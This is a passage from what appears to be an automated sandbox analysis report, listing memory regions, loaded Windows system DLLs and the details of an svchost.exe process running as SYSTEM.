"\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1309 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1310 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1311 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1312 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1313 start_va = 0x2540000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1314 start_va = 0x2540000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1315 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1316 start_va = 0x2590000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 1317 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1318 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1319 start_va = 0x2690000 end_va = 0x2817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1320 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1321 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1322 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Thread: id = 82 os_tid = 0xfbc Thread: id = 83 os_tid = 0xaf4 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x96e9000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c5c1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1330 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1331 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1332 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1333 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1334 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1335 start_va = 0xc0000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1336 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1337 start_va = 0x190000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1338 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1339 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1340 start_va = 0x320000 end_va = 0x32cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1341 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1342 start_va = 0x340000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1343 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1344 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1345 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1346 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1347 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1348 start_va = 0x500000 end_va = 0x501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1349 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1350 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1351 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1352 start_va = 0x5b0000 end_va = 0x737fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1353 start_va = 0x740000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1354 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 1355 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1356 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1357 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 1358 start_va = 0x980000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1359 start_va = 0xa00000 end_va = 0xa1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rasdlg.dll.mui" filename = "\\Windows\\System32\\en-US\\rasdlg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rasdlg.dll.mui") Region: id = 1360 start_va = 0xa20000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1361 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1362 start_va = 0xba0000 end_va = 0xe6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1363 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1364 start_va = 0xf30000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1365 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1366 start_va = 0x1080000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1367 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1368 start_va = 0x1210000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 1369 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1370 start_va = 0x13d0000 end_va = 0x13dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1371 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 1372 start_va = 0x15b0000 end_va = 0x162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 1373 start_va = 0x1710000 end_va = 0x171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 1374 start_va = 0x1730000 end_va = 0x17affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 1375 start_va = 0x1920000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 1376 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 1377 start_va = 0x1b10000 end_va = 0x1b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b10000" filename = "" Region: id = 1378 start_va = 0x1ba0000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1379 start_va = 0x1bc0000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 1380 start_va = 0x1c40000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1381 start_va = 0x1d60000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1382 start_va = 0x1e20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1383 start_va = 0x1fd0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1384 start_va = 0x1fe0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1385 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1386 start_va = 0x2190000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1387 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1388 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1389 start_va = 0x2340000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1390 start_va = 0x24b0000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1391 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 1392 start_va = 0x25a0000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1393 start_va = 0x3190000 end_va = 0x320ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1394 start_va = 0x73440000 end_va = 0x73442fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 1395 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1396 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1397 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1398 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1399 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1400 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1401 start_va = 0xffa90000 end_va = 0xffa9afff monitored = 0 entry_point = 0xffa9246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1402 start_va = 0x7fef4710000 end_va = 0x7fef472bfff monitored = 0 entry_point = 0x7fef47111a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1403 start_va = 0x7fef4730000 end_va = 0x7fef4791fff monitored = 0 entry_point = 0x7fef4731198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1404 start_va = 0x7fef47a0000 end_va = 0x7fef47d9fff monitored = 0 entry_point = 0x7fef47a1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1405 start_va = 0x7fef47e0000 end_va = 0x7fef48b7fff monitored = 0 entry_point = 0x7fef4848bd0 region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll") Region: id = 1406 start_va = 0x7fef48c0000 end_va = 0x7fef491bfff monitored = 0 entry_point = 0x7fef48c8c20 region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll") Region: id = 1407 start_va = 0x7fef4b60000 end_va = 0x7fef4deafff monitored = 0 entry_point = 0x7fef4b66f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1408 start_va = 0x7fef8760000 end_va = 0x7fef876bfff monitored = 0 entry_point = 0x7fef876419c region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 1409 start_va = 0x7fef8770000 end_va = 0x7fef8786fff monitored = 0 entry_point = 0x7fef877d308 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 1410 start_va = 0x7fef87e0000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef87e11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1411 start_va = 0x7fef8950000 end_va = 0x7fef8a0cfff monitored = 0 entry_point = 0x7fef8951ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1412 start_va = 0x7fef8f90000 end_va = 0x7fef8ffafff monitored = 0 entry_point = 0x7fef8fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1413 start_va = 0x7fef9000000 end_va = 0x7fef9012fff monitored = 0 entry_point = 0x7fef9001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1414 start_va = 0x7fef91e0000 end_va = 0x7fef9263fff monitored = 0 entry_point = 0x7fef9231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1415 start_va = 0x7fef92e0000 end_va = 0x7fef92edfff monitored = 0 entry_point = 0x7fef92e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1416 start_va = 0x7fef92f0000 end_va = 0x7fef9316fff monitored = 0 entry_point = 0x7fef92f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1417 start_va = 0x7fef9320000 end_va = 0x7fef93f2fff monitored = 0 entry_point = 0x7fef9398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1418 start_va = 0x7fef9580000 end_va = 0x7fef95f6fff monitored = 0 entry_point = 0x7fef95be7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1419 start_va = 0x7fef9640000 end_va = 0x7fef9661fff monitored = 0 entry_point = 0x7fef9641020 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 1420 start_va = 0x7fef9820000 end_va = 0x7fef982ffff monitored = 0 entry_point = 0x7fef9821010 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 1421 start_va = 0x7fef9830000 end_va = 0x7fef9841fff monitored = 0 entry_point = 0x7fef9831050 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 1422 start_va = 0x7fef9850000 end_va = 0x7fef98a6fff monitored = 0 entry_point = 0x7fef9851118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1423 start_va = 0x7fef98b0000 end_va = 0x7fef98e2fff monitored = 0 entry_point = 0x7fef98b101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 1424 start_va = 0x7fef98f0000 end_va = 0x7fef9908fff monitored = 0 entry_point = 0x7fef98f2b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1425 start_va = 0x7fefa720000 end_va = 0x7fefa72ffff monitored = 0 entry_point = 0x7fefa7227f0 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 1426 start_va = 0x7fefa730000 end_va = 0x7fefa73afff monitored = 0 entry_point = 0x7fefa731198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1427 start_va = 0x7fefa740000 end_va = 0x7fefa766fff monitored = 0 entry_point = 0x7fefa7498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1428 start_va = 0x7fefa810000 end_va = 0x7fefa81afff monitored = 0 entry_point = 0x7fefa814f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1429 start_va = 0x7fefa820000 end_va = 0x7fefa82bfff monitored = 0 entry_point = 0x7fefa8215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1430 start_va = 0x7fefa840000 end_va = 0x7fefa858fff monitored = 0 entry_point = 0x7fefa8411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1431 start_va = 0x7fefa8a0000 end_va = 0x7fefa8dcfff monitored = 0 entry_point = 0x7fefa8a1b7c region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 1432 start_va = 0x7fefa8e0000 end_va = 0x7fefa8f4fff monitored = 0 entry_point = 0x7fefa8e60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1433 start_va = 0x7fefa9d0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefa9d10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1434 start_va = 0x7fefab00000 end_va = 0x7fefab2ffff monitored = 0 entry_point = 0x7fefab1fe98 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 1435 start_va = 0x7fefab30000 end_va = 0x7fefabdbfff monitored = 0 entry_point = 0x7fefab418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 1436 start_va = 0x7fefac00000 end_va = 0x7fefac08fff monitored = 0 entry_point = 0x7fefac01010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1437 start_va = 0x7fefac10000 end_va = 0x7fefac3bfff monitored = 0 entry_point = 0x7fefac115c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1438 start_va = 0x7fefac40000 end_va = 0x7fefacebfff monitored = 0 entry_point = 0x7fefac56acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1439 start_va = 0x7fefacf0000 end_va = 0x7fefad1cfff monitored = 0 entry_point = 0x7fefacf1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1440 start_va = 0x7fefad20000 end_va = 0x7fefad30fff monitored = 0 entry_point = 0x7fefad214c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1441 start_va = 0x7fefad60000 end_va = 0x7fefad9efff monitored = 0 entry_point = 0x7fefad612c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1442 start_va = 0x7fefaff0000 end_va = 0x7fefb000fff monitored = 0 entry_point = 0x7fefaff1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1443 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1444 start_va = 0x7fefb1b0000 end_va = 0x7fefb1fafff monitored = 0 entry_point = 0x7fefb1befcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1445 start_va = 0x7fefb620000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb6294bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1446 start_va = 0x7fefb7a0000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb92c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1447 start_va = 0x7fefbe30000 end_va = 0x7fefbe3bfff monitored = 0 entry_point = 0x7fefbe31064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1448 start_va = 0x7fefbff0000 end_va = 0x7fefc00afff monitored = 0 entry_point = 0x7fefbff2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1449 start_va = 0x7fefc010000 end_va = 0x7fefc02dfff monitored = 0 entry_point = 0x7fefc0113b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1450 start_va = 0x7fefc030000 end_va = 0x7fefc041fff monitored = 0 entry_point = 0x7fefc031060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1451 start_va = 0x7fefc160000 end_va = 0x7fefc169fff monitored = 0 entry_point = 0x7fefc163cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1452 start_va = 0x7fefc170000 end_va = 0x7fefc17cfff monitored = 0 entry_point = 0x7fefc171348 